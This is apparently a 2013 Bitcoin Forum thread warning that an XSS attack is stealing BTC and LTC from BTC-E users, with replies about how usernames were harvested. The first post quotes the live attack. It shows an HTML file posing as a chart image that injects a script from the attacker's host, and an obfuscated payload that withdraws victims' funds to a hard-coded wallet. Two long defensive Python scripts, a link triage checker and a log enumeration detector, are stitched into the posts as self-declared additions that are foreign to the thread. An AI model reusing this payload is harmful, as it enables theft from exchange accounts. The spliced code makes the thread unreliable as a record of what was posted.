Bitcoin Forum
Author Topic: Attention - Someone is stealing BTC & LTC at BTC-E  (Read 1163 times)
nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 06:35:36 PM #1

Hello,

today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or used the PM system there.

It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file.

Quote
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
        <head>
        </head>
        <body>
        <script language="JavaScript">
        document.location="https://btc-e.com/news/32?page=1<script+src=http://fast-image.com/q.js><\/script>";
        </script>
        </body>
        </html>

This downloads a script which seems to exploit an XSS vulnerability on BTC-E.

Quote
eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \"http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);"))

According to Blockexplorer, significant amounts of BTC were already stolen:

http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo
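The OP's triage (fetch the link with wget, then look at what actually came back) can be turned into a repeatable check. The Python below is an added example, not code from this thread or from BTC-E: it classifies the fetched body by its leading bytes (so a ".jpg" that begins with a DOCTYPE is flagged), pulls the JavaScript redirect target out of the HTML, and reports any query parameter carrying a "<script" tag, which is the reflected-XSS symptom the OP points at. The render_vulnerable / render_hardened pair at the end is a generic illustration of why an unvalidated page parameter can be abused and how it should be validated and escaped; it is not BTC-E's code. SAMPLE_BODY reproduces the HTML quoted above; all function names and the IMAGE_MAGIC table are my own.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: the link from the post and the HTML it served (as quoted above).
SAMPLE_URL = "http://fast-image.com/guh8ydyxz/bitcoin_chart15493.jpg"
SAMPLE_BODY = b"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head></head>
<body>
<script language="JavaScript">
document.location="https://btc-e.com/news/32?page=1<script+src=http://fast-image.com/q.js><\\/script>";
</script>
</body>
</html>"""

# Leading bytes of the image formats a chart link would plausibly point at.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def sniff_type(body):
    """Classify a response body by its content, ignoring what the URL claims."""
    for magic, name in IMAGE_MAGIC.items():
        if body.startswith(magic):
            return name
    head = body.lstrip()[:64].lower()
    if head.startswith((b"<!doctype", b"<html", b"<script")):
        return "html"
    return "unknown"


def claimed_extension(url):
    """File extension the URL path advertises (empty string if none)."""
    last = urlsplit(url).path.rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[-1].lower() if "." in last else ""


REDIRECT_RE = re.compile(r'(?:document|window)\.location(?:\.href)?\s*=\s*["\']([^"\']*)["\']')


def extract_redirect(body):
    """Target of a JavaScript location assignment inside an HTML body, if any."""
    m = REDIRECT_RE.search(body.decode("utf-8", "replace"))
    return m.group(1) if m else None


SCRIPT_RE = re.compile(r"<\s*script", re.IGNORECASE)


def injected_params(url):
    """Names of query parameters whose (decoded) value carries a <script tag."""
    query = urlsplit(url).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True) if SCRIPT_RE.search(v)]


def triage(url, body):
    """Summarise why a link should be treated as hostile rather than as an image."""
    kind = sniff_type(body)
    ext = claimed_extension(url)
    redirect = extract_redirect(body) if kind == "html" else None
    return {
        "content_type": kind,
        "extension_mismatch": ext in IMAGE_EXTENSIONS and kind != ext.replace("jpg", "jpeg"),
        "redirect": redirect,
        "injected_params": injected_params(redirect) if redirect else [],
    }


def render_vulnerable(page):
    """Illustrative pattern only: the parameter is echoed into markup unchanged."""
    return '<a href="?page=%s">next</a>' % page


def render_hardened(page):
    """Validate against the expected shape (a page number), then still escape on output."""
    if not page.isdigit():
        page = "1"
    return '<a href="?page=%s">next</a>' % html.escape(page, quote=True)


if __name__ == "__main__":
    print(triage(SAMPLE_URL, SAMPLE_BODY))
```

Run it with the fetched body in place of SAMPLE_BODY; a result with content_type "html", extension_mismatch True and a non-empty injected_params list is exactly the pattern described in this thread, and the same checks work as a mail- or chat-link scanner on the receiving side.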



nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 06:41:57 PM #2

(could an admin/moderator move this to the proper section please?)
maurits150
Newbie, Activity: 7, Merit: 0
April 21, 2013, 06:42:35 PM #3

I'm also interested how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.
dudeofthestick
Member, Activity: 78, Merit: 10
April 21, 2013, 06:46:36 PM #4

What operating system and browser version are you using? With versions, please.
Becher-Karl
Newbie, Activity: 48, Merit: 0
April 21, 2013, 06:52:09 PM #5

In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.
nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 06:52:58 PM #6

Quote
What operating system and browser version are you using? With versions, please.

Browser? I prefer to use wget on a separate Linux box when someone wants me to click strange links...  Grin
nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 06:54:34 PM #7

Quote
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident.
optimator
Sr. Member, Activity: 351, Merit: 250
April 21, 2013, 06:58:50 PM #8

Quote
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess

nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 07:10:45 PM #9

Looks like they have removed the attack scripts from the server. No problem, you have a copy here now.  Grin
bzh
Newbie, Activity: 34, Merit: 0
April 21, 2013, 07:15:10 PM #10

Quote
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess

I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.
samten
Newbie, Activity: 14, Merit: 0
April 21, 2013, 07:30:40 PM #11

don't trust strangers
optimator
Sr. Member, Activity: 351, Merit: 250
April 21, 2013, 07:38:05 PM #12

Quote
I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.

Bummer! That does lead one to the conclusion that there was inside help....

moni3z
Hero Member, Activity: 899, Merit: 1002
April 21, 2013, 07:49:20 PM #13
Last edit: April 22, 2013, 03:54:28 AM by moni3z

You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs.

https://btc-e.com/profile/1000
https://btc-e.com/profile/10000
https://btc-e.com/profile/80001
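moni3z's observation, that profile pages are numbered sequentially and can therefore be walked, also gives the site operator a clear detection signal. The Python below is an added example, not code from this thread or from BTC-E: it parses constructed access-log lines (Combined Log Format, with client addresses from the documentation ranges) and flags any client whose requests to /profile/<id> step through consecutive ids within a short interval, which is what a mass-PM harvesting run looks like from the server side. The thresholds (min_run, max_gap), the log format and the function names are assumptions of this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log; none of these lines come from BTC-E.
# 203.0.113.5 walks profile ids 1000..1006 one per second, 198.51.100.7 browses normally.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Apr/2013:17:01:00 +0000] "GET /profile/1000 HTTP/1.1" 200 2311 "-" "curl/7.29"
198.51.100.7 - - [21/Apr/2013:17:01:01 +0000] "GET /profile/42 HTTP/1.1" 200 2290 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Apr/2013:17:01:01 +0000] "GET /profile/1001 HTTP/1.1" 200 2301 "-" "curl/7.29"
203.0.113.5 - - [21/Apr/2013:17:01:02 +0000] "GET /profile/1002 HTTP/1.1" 200 2308 "-" "curl/7.29"
198.51.100.7 - - [21/Apr/2013:17:01:02 +0000] "GET /news/32?page=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Apr/2013:17:01:03 +0000] "GET /profile/1003 HTTP/1.1" 200 2299 "-" "curl/7.29"
203.0.113.5 - - [21/Apr/2013:17:01:04 +0000] "GET /profile/1004 HTTP/1.1" 404 512 "-" "curl/7.29"
203.0.113.5 - - [21/Apr/2013:17:01:05 +0000] "GET /profile/1005 HTTP/1.1" 200 2315 "-" "curl/7.29"
198.51.100.7 - - [21/Apr/2013:17:01:06 +0000] "GET /profile/43 HTTP/1.1" 200 2288 "-" "Mozilla/5.0"
203.0.113.5 - - [21/Apr/2013:17:01:06 +0000] "GET /profile/1006 HTTP/1.1" 200 2304 "-" "curl/7.29"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PROFILE_RE = re.compile(r"^/profile/(\d+)(?:[/?]|$)")


def parse_profile_hits(log_text):
    """Return {ip: [(timestamp, profile_id), ...]} for every request to /profile/<id>, sorted by time."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        p = PROFILE_RE.match(m.group("path"))
        if not p:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        hits[m.group("ip")].append((ts, int(p.group(1))))
    for ip in hits:
        hits[ip].sort()
    return hits


def longest_sequential_run(events, max_gap=timedelta(seconds=30)):
    """Length of the longest run of requests whose ids increase by exactly 1, each within max_gap of the last."""
    best = run = 1 if events else 0
    for (prev_ts, prev_id), (ts, pid) in zip(events, events[1:]):
        if pid == prev_id + 1 and ts - prev_ts <= max_gap:
            run += 1
        else:
            run = 1
        best = max(best, run)
    return best


def detect_enumeration(log_text, min_run=5):
    """Return {ip: run_length} for clients walking profile ids sequentially (run_length >= min_run)."""
    flagged = {}
    for ip, events in parse_profile_hits(log_text).items():
        run = longest_sequential_run(events)
        if run >= min_run:
            flagged[ip] = run
    return flagged


if __name__ == "__main__":
    for ip, run in detect_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {run} consecutive profile ids requested")
```

A flagged client is a candidate for rate limiting or a CAPTCHA on profile views and private messages; the run-length check tolerates the occasional 404 (a deleted profile) because it keys on the id sequence, not the status code.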
nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 08:10:25 PM #14

Quote
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs.

You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.
nsieugesug (OP)
Newbie, Activity: 7, Merit: 0
April 21, 2013, 08:40:09 PM #15

Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)?

I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.  Angry